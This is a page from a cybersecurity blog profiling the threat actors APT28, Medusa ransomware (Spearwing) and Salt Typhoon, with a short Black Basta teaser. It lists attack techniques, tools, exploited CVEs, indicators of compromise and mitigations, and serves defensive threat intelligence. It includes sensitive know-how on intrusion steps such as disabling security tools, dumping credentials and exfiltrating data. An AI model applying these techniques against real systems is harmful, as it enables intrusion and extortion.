Connect with us

Threat Actors

The Russian Bear Unleashed: The Cyber Threat of APT28

Beyond its majestic image, the Russian Bear has a darker side. Delve into the world of cyber espionage and uncover the advanced tactics and tools employed by APT28 to steal sensitive information and disrupt critical systems.

Published

on

The Russian Bear, a symbol deeply ingrained in Russian culture, is often associated with the Eurasian brown bear. This majestic creature, known for its immense strength and solitary nature, embodies the vast and untamed landscapes of Russia. From the dense forests of Siberia to the remote wilderness of Kamchatka, the Russian Bear roams freely, captivating imaginations and evoking a sense of awe and respect.

APT28, also known as Fancy Bear, amongst other aliases, does not evoke the same sense of awe and respect, well not from a Cyber Defenders perspective. AP28 is a highly sophisticated cyber espionage group assessed to be linked to the Russian General Staff Main Intelligence Directorate (GRU) 85th special Service Centre (GTsSS) Military Intelligence Unit.

Estonian and British intelligence services have also associated APT28 with Russian military intelligence (GRU). The United States believes that GRU units 26165 and 74455 form part of this threat actor. APT28 has been active since at least 2004.

Targets and Objectives

APT28 primarily targets:

  • Governments
  • Military organisations
  • Media outlets
  • Research institutions
  • Private sector companies

The group’s objectives include:

  • Gathering intelligence
  • Stealing sensitive information
  • Disrupting systems
  • Influencing political processes
  • Criminal financial gain

Tactics, Techniques and Procedures (TTPs)

APT28 is known for its sophisticated and constantly evolving TTPs, which include:

  • Spearphishing: They send targeted emails with malicious attachments or links, often disguised as legitimate communications, to trick victims into revealing their credentials or installing malware.
  • Exploiting vulnerabilities: They exploit software vulnerabilities in operating systems, applications and network devices to gain unauthorised access to systems. These may include zero-day exploits, taking advantage of vulnerabilities before patches are available.
  • Watering hole attacks: They compromise websites frequently visited by target organisations and inject malicious code to deliver malware to visitors.
  • Credential harvesting: They create spoofed websites mimicking legitimate organisations to steal user credentials.
  • Brute-force attacks: They use brute-force techniques, including password spraying, to gain access to accounts.
  • Lateral movement: Once inside a network, they move laterally to other systems using techniques such as pass-the-hash and exploiting the EternalBlue vulnerability, expanding their access and searching for valuable data.
  • Data exfiltration: They steal sensitive information such as intellectual property, trade secrets and personal data, often using encrypted channels to avoid detection.
  • Command and control (C2) infrastructure: They utilise various protocols, including HTTP and DNS, to communicate with malware and exfiltrate data, making it difficult to detect and block their activities25. They may also leverage compromised infrastructure, including routers and network devices, to act as C2 servers.

Notable Malware and Tools

APT28 uses a range of custom-developed and publicly available malware and tools, including:

  • Sednit/Sofacy: A modular suite of malware tools designed for surveillance, data theft and persistence.
  • XAgent: A remote access trojan (RAT) that runs on iOS, Unix and Windows and currently protects communications with SSL/TLS. XAgent does key logging and file extraction.
  • X-Tunnel: A network tunnelling tool used to create encrypted tunnels for secure data exfiltration.
  • CompuTrace/Lojack: Legitimate software modified by APT28 to enable persistence.
  • Responder: An open source tool used to facilitate NetBIOS Name Service (NBT-NS) poisoning and steal usernames and hashed passwords.
  • EternalBlue: An exploit for a vulnerability in Microsoft’s SMB protocol, used for lateral movement.
  • Empire: A post-exploitation framework, including PowerShell and Python versions, used for various malicious activities.

Notable Attacks

APT28 has been linked to several high-profile cyberattacks, including:

  • Interference in the 2016 US presidential election: The group targeted the Democratic National Committee (DNC) and the Hillary Clinton campaign, stealing sensitive emails and other information that were later leaked to the public.
  • Attack on the German parliament in 2015: This attack involved data theft and the disruption of email accounts belonging to German Members of Parliament (MPs) and the Vice Chancellor.
  • Attempted attack on the Organisation for the Prohibition of Chemical Weapons (OPCW) in 2018: This attack was intended to disrupt independent analysis of chemical weapons used by the GRU in the UK.
  • Compromising a satellite communications provider in 2023: This intrusion targeted a provider with critical infrastructure customers.
  • Targeting the hospitality sector in 2017: APT28 targeted hotels throughout Europe and the Middle East, using techniques such as sniffing passwords from Wi-Fi traffic and spreading laterally via EternalBlue.

Mitigating the Threat

Organisations can take steps to mitigate the threat posed by APT28 and other advanced persistent threats:

  • Implement strong password policies: Enforce strong, unique passwords for all accounts and implement multi-factor authentication where possible.
  • Keep systems and software up to date: Regularly patch systems and applications to address known vulnerabilities.
  • Educate employees on security best practices: Train employees on how to identify and avoid phishing attacks and other social engineering tactics.
  • Network segmentation: Divide networks into smaller segments to limit the impact of a potential breach.
  • Employ advanced security tools: Utilise intrusion detection systems, firewalls, endpoint protection solutions, and security information and event management (SIEM) systems to detect and respond to malicious activity.
  • Develop and test incident response plans: Establish procedures for responding to security incidents and regularly test these plans.
  • Threat intelligence sharing: Participate in information sharing with other organisations and industry groups to stay informed about the latest threats and TTPs.
Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Threat Actors

Spearwing / Medusa Ransomware Threat Actor Profile

Medusa is a notable ransomware-as-a-service (RaaS) variant that emerged in June 2021, utilizing a double extortion model to encrypt data and threaten public release of sensitive information. Operated by the group “Spearwing,” Medusa has shifted towards an affiliate model, significantly impacting critical sectors like healthcare and manufacturing, with over 300 reported victims by early 2025. The introduction of a dedicated leak site in 2023 and a 42% surge in attacks from 2023 to 2024 highlight its growing threat. Organizations must strengthen cybersecurity measures, including patching vulnerabilities and implementing multi-factor authentication, to counteract this persistent danger.

Published

on

In the rapidly changing environment of cyber threats, Medusa stands out as a particularly menacing ransomware-as-a-service (RaaS) variant that first emerged in June 2021. Employing a double extortion model, this ransomware not only encrypts its victims’ data but also threatens to publicly release sensitive information if the ransom demands are not met. This dual-layered approach has enabled Medusa to significantly escalate its operations, with its impact felt across critical sectors, including healthcare, education, and manufacturing, where over 300 victims have been reported by early 2025.

The group behind Medusa, known as “Spearwing,” has transitioned from a closed ecosystem to a broader affiliate model, leveraging initial access brokers to extend its reach and effectiveness. With the introduction of a dedicated data leak site in early 2023 and a marked increase in attacks, understanding the tactics, techniques, and implications of Medusa ransomware is crucial for organizations striving to bolster their cybersecurity defenses in the face of such persistent threats.

The following sections will delve deeper into Medusa’s operational model, extortion tactics, technical details, and strategies for mitigation.

Overview and Origins

Medusa is identified as a ransomware-as-a-service (RaaS) variant that was first observed in June 2021. It has become increasingly prolific since then. The group operates a double extortion model, where they not only encrypt victim data but also threaten to publicly release exfiltrated data if a ransom is not paid. Medusa is distinct from the older MedusaLocker ransomware variant and the unrelated Medusa mobile malware. The group is tracked by Symantec as “Spearwing“. In early 2023, Medusa launched the “Medusa Blog,” a dedicated leak site to publish data from non-paying victims.

Activity and Impact

As of February 2025, Medusa developers and affiliates had impacted over 300 victims from a variety of critical infrastructure sectors. These sectors include medical, education, legal, insurance, technology, and manufacturing. There was a 42% surge in Medusa attacks between 2023 and 2024, and this increase continued into early 2025, with almost twice as many attacks observed in January and February 2025 compared to the same period in 2024. The true number of victims is likely higher than the number listed on their data leak site. Ransom demands have ranged from $100,000 to $15 million. The impact of Medusa ransomware can be devastating, leading to operational disruptions, financial losses, and reputational damage.

Operating Model

Medusa operates as a RaaS platform. Initially a closed group, it has since expanded to use an affiliate-based ecosystem. Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to gain initial access. Potential payments between $100 USD and $1 million USD are offered to these affiliates. Important operations such as ransom negotiation are still centrally controlled by the developers. There is some question as to whether Spearwing operates as a “typical” RaaS, given the consistency of tactics used, possibly indicating the group carries out attacks themselves or works with a very limited number of affiliates and provides a detailed playbook.

Extortion Tactics

Medusa employs a double extortion model, encrypting data and threatening to publish exfiltrated data on their .onion data leak site (Medusa Blog) if the ransom is not paid. They operate a public Telegram channel (“information support”) where they also publicise hacks and release stolen data, making it more accessible than some other ransomware groups. Ransom demands are posted on the leak site with direct hyperlinks to Medusa-affiliated cryptocurrency wallets. They also advertise the sale of the data to interested parties before the countdown timer ends. Victims can pay $10,000 USD in cryptocurrency to add a day to the countdown timer. FBI investigations identified a potential triple extortion scheme where a separate Medusa actor contacted a victim after ransom payment, claiming the negotiator stole the initial payment and demanding a second payment.

Technical Details (TTPs)

  • Initial Access (TA0001):
    • Phishing campaigns (T1566) are a primary method for stealing victim credentials.
    • Exploitation of unpatched software vulnerabilities (T1190) through Common Vulnerabilities and Exposures (CVEs) such as ScreenConnect vulnerability CVE-2024-1709 and Fortinet EMS SQL injection vulnerability CVE-2023-48788. They have also exploited Microsoft Exchange Server vulnerabilities (ProxyShell, CVE-2021-34473).
    • Recruitment of initial access brokers (IABs) (TA0001).
    • Use of compromised RDP credentials (T1133).
    • Uploading webshells to exploited Microsoft Exchange Servers.
  • Execution (TA0002):
    • Use of PowerShell (T1059.001) and the Windows Command Prompt (cmd.exe) (T1059.003) for various tasks.
    • Leveraging legitimate tools like ConnectWise, PDQ Deploy, and PsExec.
    • Use of batch scripts including gaze.exe.
    • Utilising Windows Management Instrumentation (WMI) (T1047) for querying system information and deleting shadow copies.
  • Persistence (TA0003):
    • Modifying the registry (T1547.001, HKLM\Software\Microsoft\Windows\CurrentVersion\Run).
    • Creating malicious scheduled tasks (T1053).
    • Creating domain accounts (T1136.002).
  • Privilege Escalation (TA0004):
    • Abuse of Elevation Control Mechanism (T1548.002) by bypassing User Account Control (UAC).
    • Use of valid accounts (T1078) obtained through various methods.
    • LSASS memory dumping (T1003.001) using tools like Mimikatz.
  • Defense Evasion (TA0005):
    • Use of living off the land (LOTL) techniques (TA0005) to avoid detection, leveraging legitimate tools present in the victim environment.
    • Using Certutil (certutil.exe) for file ingress to avoid detection.
    • Employing various PowerShell detection evasion techniques, including base64 encryption and string obfuscation.
    • Attempting to delete PowerShell command line history (T1070.003).
    • Attempting to use vulnerable or signed drivers (Bring Your Own Vulnerable Driver – BYOVD) (T1562.001) to kill or delete endpoint detection and response (EDR) tools. Malicious drivers like ABYSSWORKER (imitating a CrowdStrike Falcon driver) are used. They also use tools like KillAV and POORTRY.
    • Using reverse tunneling tools like Ligolo and Cloudflared (formerly ArgoTunnel) for command and control and evasion.
    • Disabling Windows Defender and other antivirus services.
    • Rebooting systems into Safe Mode.
    • Deleting previously installed tools (T1070).
  • Discovery (TA0007):
    • Using legitimate tools like Advanced IP Scanner and SoftPerfect Network Scanner (NetScan) for initial user, system, and network enumeration.
    • Scanning commonly used ports (21, 22, 23, 80, 115, 443, 1433, 3050, 3128, 3306, 3389).
    • Using PowerShell and cmd.exe for network (T1046) and filesystem enumeration (T1083).
    • Utilizing Windows Management Instrumentation (WMI) (T1047) for querying system information.
    • Querying shared drives (T1135) on the local system.
    • Gathering system network configuration (T1016) and detailed system information (T1082) using commands like ipconfig /all and systeminfo.
    • Attempting to find domain-level group and permission settings (T1069.002).
    • Using driverquery, net share, net use, netstat -a, sc query, schtasks, ver, wmic for reconnaissance.
  • Lateral Movement (TA0008):
    • Using a variety of legitimate remote access software (T1219) such as AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop.
    • Utilizing Remote Desktop Protocol (RDP) (T1021.001).
    • Using PsExec (T1569.002) to move laterally and deploy the encryptor.
    • Leveraging SMB/Windows Admin Shares (T1021.002).
  • Exfiltration (TA0010):
    • Identifying files for exfiltration.
    • Installing and using Rclone (T1567.002) to facilitate data exfiltration to Medusa C2 servers.
  • Encryption (T1486):
    • Deploying the encryptor, gaze.exe, across the network using tools like PsExec, PDQ Deploy, or BigFix (T1072).
    • Terminating services (T1489) related to backups, security, databases, communication, file sharing, and websites.
    • Deleting shadow copies (T1490).
    • Encrypting files with AES-256.
    • Appending the .medusa file extension to encrypted files.
    • Dropping the ransom note, typically named !!!READ_ME_MEDUSA!!!.txt.
    • Manually turning off (T1529) and encrypting virtual machines.
    • Deleting itself after encryption.
  • Command and Control (C2):
    • Using reverse tunneling tools like Ligolo and Cloudflared.
    • Communicating using application layer protocols associated with web traffic (T1071.001), including scripts that create reverse or bind shells over port 443 (HTTPS).
    • Leveraging remote access software (T1219) for control.

Indicators of Compromise (IOCs)

  • File Paths and Names:
    • csidl_windows\adminarsenal\pdqdeployrunner\service-1\exec\gaze.exe.
    • svhost.exe (in AppData).
    • !!!READ_ME_MEDUSA!!!.txt.
    • openrdp.bat.
    • pu.exe.
  • File Extensions:
    • .medusa.
    • .mylock.
    • .s3db (observed in one Darktrace investigation).
  • Domains & URLs:
    • medusakxxtp3uo7vusntvubnytaph4d3amxivbggl3hnhpk2nmus34yd[.]onion.
    • go-sw6-02.adventos[.]de.
    • medusaxko7jxtrojdkxo66j7ck4q5tgktf7uqsqyfry4ebnxlcbkccyd[.]onion.
  • Registry Keys:
    • HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MDSLK.
  • Email Addresses (used for ransom negotiation):
    • key.medusa.serviceteam@protonmail.com.
    • medusa.support@onionmail.org.
    • mds.svt.breach@protonmail.com.
    • mds.svt.mir2@protonmail.com.
    • MedusaSupport@cock.li.
  • Hashes (examples): See Table 1 in source and hashes listed in. Note that some sources redact hashes.
  • Credentials (observed in a Darktrace investigation): Svc-ndscans, Svc-NinjaRMM.

Mitigation Strategies

Organisations are advised to:

  • Mitigate known vulnerabilities by ensuring operating systems, software, and firmware are patched and up to date.
  • Segment networks to limit lateral movement.
  • Filter network traffic by blocking access from unknown or untrusted origins to remote services on internal systems.
  • Implement the recommendations in the Mitigations section of the CISA advisory.
  • Enable MFA for RDP and VPNs.
  • Disable PowerShell for non-administrators.
  • Regularly back up data offline. Ensure backups are immutable.
  • Implement strong security measures, including up-to-date security solutions.
  • Use hard-to-crack unique passwords and enable multi-factor authentication.
  • Encrypt sensitive data wherever possible.
  • Reduce the attack surface by disabling unnecessary functionality.
  • Educate and inform staff about cyber threats and methods used by attackers.
  • Block known Medusa domains.
  • Detect unusual RDP access patterns and SMB enumeration.
  • Use behavioral analytics to detect mass file encryption.
  • Isolate infected systems immediately.
  • Restore from offline backups.
  • Report incidents to CISA/FBI.
  • Consider using AI-powered endpoint protection and AI-powered email protection.
  • Create and regularly test a detailed incident response plan.
  • Disable unused remote access tools or secure them with strong passwords and MFA.
  • Apply the principle of least privilege.
  • Consider disabling command-line and scripting activities and permissions to limit LotL techniques.
  • Validate security controls against the MITRE ATT&CK techniques outlined in the advisory.

Relationships and Ecosystem

The Medusa ransomware group appears to operate independently, with its own infrastructure. However, the organised cybercrime group “Frozen Spider” is believed to be a key player in the Medusa ransomware operation, collaborating with other threat actors as part of the larger cybercrime-as-a-service (CCaaS) ecosystem. In June 2023, an early Medusa attack used drivers related to those previously used in a BlackCat (aka Noberus) attack, suggesting a possible sharing of tools or affiliates, although no further evidence strongly links the two groups. Medusa heavily relies on initial access brokers (IABs) to gain access to victim networks.

Branding and Public Presence

Medusa operates a data leak site (Medusa Blog) on the dark web (.onion). They also maintain a public Telegram channel (“information support”) used to publicise victims and leak data. Additionally, they have been linked to a Facebook profile and an X (formerly Twitter) account under the brand ‘OSINT Without Borders,’ run by operators using pseudonyms ‘Robert Vroofdown’ and ‘Robert Enaber,’ along with an associated website. These public-facing properties are likely intended to exert more pressure on victims and spread awareness of the Medusa ransomware threat. The group has a “Medusa Media Team” that has even published videos showing evidence of stolen data on their blog.

Conclusion

Medusa ransomware represents a significant and evolving cyber threat targeting a wide range of critical infrastructure sectors globally. Its use of a double (and potentially triple) extortion model, reliance on affiliates and IABs, and consistent employment of both sophisticated and LOTL techniques make it a challenging adversary. Organisations must adopt a defense-in-depth strategy, continuously update their threat intelligence, and implement robust security controls to mitigate the risk posed by Medusa ransomware.

Continue Reading

Threat Actors

Salt Typhoon: A Deep Dive into a Persistent Cyber Espionage Threat

Salt Typhoon, a Chinese state-sponsored APT, remains a major cyber espionage threat, targeting telecoms, governments, and technology sectors. Recent activity shows exploitation of Cisco IOS XE devices, impacting organisations globally. Defend with robust cybersecurity, prioritise patching, and share threat intelligence to counter this persistent adversary.

Published

on

Salt Typhoon is a Chinese state-sponsored Advanced Persistent Threat (APT) group known for its sophisticated cyber espionage campaigns, primarily targeting the telecommunications, government, and technology sectors. The group’s operations extend beyond intelligence gathering, aiming to exert strategic pressure on adversaries by targeting critical infrastructure and key industries.

Aliases and Affiliations

Salt Typhoon operates under various aliases, including:

  • Earth Estries.
  • GhostEmperor.
  • FamousSparrow.
  • UNC2286.
  • RedMike.

The group is believed to be affiliated with China’s Ministry of State Security (MSS). Connections to other Chinese APT groups, such as DRBControl, SparklingGoblin, and the Winnti Group, have also been observed, indicating shared methodologies and a coordinated state-backed effort.

Timeline and Key Campaigns

  • 2019: Believed to be active since at least 2019, with some suggesting activity as far back as 2017.
  • March 2021: Exploited ProxyLogon vulnerabilities in Microsoft Exchange servers.
  • Late 2023: Resurfaced with network compromises involving the Demodex rootkit.
  • September 2024: Breached US Internet Service Providers (ISPs).
  • November 2024: Targeted T-Mobile, exfiltrating customer call records and metadata.
  • December 2024 – January 2025: Exploited Cisco IOS XE network devices, targeting telecommunications providers and universities globally.

Target Sectors and Geographic Focus

Salt Typhoon’s targets span various sectors:

  • Telecommunications: Wireline and wireless telephone providers, internet service companies.
  • Government: Government entities, including those involved in national security and law enforcement.
  • Technology: Companies in the information and communication technology sector.
  • Hotels: Targeting hotels to monitor the locations of key individuals.
  • Various Others: Militaries, solar energy companies, financial institutions, NGOs, international organizations, engineering firms, and law practices.

The group’s geographic focus is broad, encompassing:

  • North America: Primarily the United States.
  • Southeast Asia: Focused efforts on hotels and telecommunications companies.
  • Other Regions: Including Brazil, Burkina Faso, South Africa, Canada, Israel, France, Guatemala, Lithuania, Saudi Arabia, Taiwan, Thailand, and the United Kingdom.

Tactics, Techniques, and Procedures (TTPs)

Salt Typhoon employs a range of sophisticated TTPs to infiltrate and maintain persistence within target environments:

  • Initial Access:
    • Exploiting public-facing applications.
    • Spearphishing attachments.
    • Exploitation of known vulnerabilities.
  • Execution:
    • Using command and scripting interpreters like PowerShell.
    • Executing malicious files, such as side-loaded DLLs.
  • Persistence:
    • Modifying the registry.
    • Creating or modifying system processes.
    • Kernel-mode malware.
  • Privilege Escalation:
    • Exploiting vulnerabilities.
    • Scheduled tasks/jobs.
  • Defense Evasion:
    • Obfuscated files or information.
    • Masquerading.
    • Indicator removal.
  • Lateral Movement:
    • Exploitation of remote services.
    • Leveraging valid credentials.
  • Credential Access:
    • Dumping credentials from password stores and web browsers.
    • Extracting credentials from files.
  • Collection:
    • Gathering data from local systems.
    • Monitoring clipboard data.
  • Command and Control:
    • Using remote access software.
    • Employing internal proxy servers.
  • Impact:
    • Data encrypted for impact (primarily for espionage, not extortion).

Toolset and Malware

Salt Typhoon utilises a diverse toolkit comprising legitimate, custom-made, and borrowed tools:

  • Custom Backdoors: SparrowDoor and Demodex.
  • Rootkits: Demodex, a Windows kernel-mode rootkit.
  • Loaders: SparrowDoor loader.
  • Remote Access Trojans (RATs): Masol RAT and SnappyBee (aka Deed RAT).
  • Exploitation Tools: Mimikat_ssp (a Mimikatz variant), Get-PassHashes.ps1, GetPwd, Token.exe.
  • Living off the Land Binaries (LOLBins): Utilising legitimate system tools to perform malicious activities.
  • GhostSpider New backdoor malware.
  • Derusbi: A DLL-based backdoor.
  • Motnug: A shellcode loader.
  • NinjaCopy: Tool to bypass security mechanisms and extract sensitive system files.

The group’s malware often incorporates anti-forensic and anti-analysis techniques to evade detection.

Vulnerabilities Exploited

Salt Typhoon has been known to exploit the following vulnerabilities:

  • CVE-2023-46805, CVE-2024-21887 (Ivanti Connect Secure VPN).
  • CVE-2023-48788 (Fortinet FortiClient EMS).
  • CVE-2022-3236 (Sophos Firewall).
  • CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 (Microsoft Exchange – ProxyLogon).
  • CVE-2023-20198 and CVE-2023-20273 (Cisco IOS XE Software).

Countermeasures and Mitigation Strategies

Defending against Salt Typhoon requires a comprehensive, multi-layered approach:

  • Robust Cybersecurity Frameworks: Implementing zero-trust architecture, continuous monitoring, and regular vulnerability assessments.
  • Patch Management: Applying security patches promptly, particularly for known vulnerabilities in Cisco devices and other network infrastructure.
  • Network Segmentation: Isolating critical systems and implementing strict access control lists (ACLs) to regulate network traffic.
  • Threat Intelligence: Sharing threat intelligence and staying informed about Salt Typhoon’s latest TTPs.
  • Incident Response: Developing and testing incident response plans to effectively contain and eradicate intrusions.
  • Out-of-Band Management: Utilising a physically separate management network to prevent unauthorised access to operational networks.
  • Secure by Design Principles: Encourage software manufacturers to embed security throughout the development lifecycle to strengthen the overall security posture of their products.
  • Encrypted Communications: Advising individuals concerned about privacy to use encrypted messaging apps and voice communications.

Attribution and Geopolitical Context

Salt Typhoon’s activities align with China’s broader geopolitical objectives, including intelligence collection, monitoring individuals, and potential disruption of adversarial capabilities. The group’s targeting of telecommunications companies enables them to intercept communications, monitor activities, and enhance their intelligence-gathering capabilities.

Conclusion

Salt Typhoon represents a significant and persistent threat to global telecommunications infrastructure and other critical sectors. The group’s advanced TTPs, diverse toolkit, and state-sponsored backing make it a formidable adversary. Organisations must adopt a proactive and multi-layered approach to security, prioritising vulnerability management, network segmentation, and threat intelligence sharing, to effectively defend against this evolving threat. Continuous vigilance and collaboration between public and private sectors are essential to mitigating the risks posed by Salt Typhoon and similar APT groups.

Continue Reading

CISO Blog

The Black Basta Menace: A Deep Dive

Published

on

This ransomware gang is a real pain in the neck. They’re relentless, sophisticated, and they’re not afraid to target anyone, from small businesses to large corporations…..you are not unlucky if they hit you they TARGET you
These cybercriminals are like digital pirates, sailing the high seas of the internet and plundering unsuspecting Spanish Galleons. They use every trick in the book, from phishing emails to exploiting vulnerabilities. And once they’re in, they wreak havoc, encrypting data and demanding a ransom.

So, what can you do to protect yourself from these cyber pirates? Well, for starters, you need to be vigilant. Don’t click on suspicious links, keep your software up-to-date, and use strong, unique passwords. And if you’re really serious about security, invest in a good cybersecurity solution.

 
Remember, the best defense is a good offense. Stay informed, stay vigilant, and most importantly, stay safe.
 
 
Want to know more? Take a look at my complete writeup of Black Basta
Continue Reading

Trending

Copyright © 2017 Keller Holdings